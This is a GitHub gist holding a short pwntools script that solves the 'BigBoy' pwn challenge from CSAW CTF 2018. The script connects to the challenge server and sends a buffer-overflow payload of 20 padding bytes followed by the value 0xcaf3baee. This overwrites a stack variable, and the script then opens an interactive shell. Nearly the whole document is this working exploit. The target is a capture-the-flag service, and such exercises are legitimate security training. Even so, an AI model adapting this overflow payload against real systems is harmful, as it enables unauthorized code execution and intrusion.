Skip to content

Instantly share code, notes, and snippets.

@faidamine
Created September 17, 2018 01:55
Show Gist options
  • Save faidamine/8a15abdc91bd34f618140944677a3bc3 to your computer and use it in GitHub Desktop.
Save faidamine/8a15abdc91bd34f618140944677a3bc3 to your computer and use it in GitHub Desktop.
BigBoy - PWN 25 - CSAW 18
#!/bin/python
#Faid Mohammed Amine
#Fb : piratuer
from pwn import *
s = remote("pwn.chal.csaw.io",9000)
pld = "A"*20
pld += p32(0xcaf3baee)
#s.recvuntil("Are you a big boiiiii??")
s.sendline(pld)
s.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment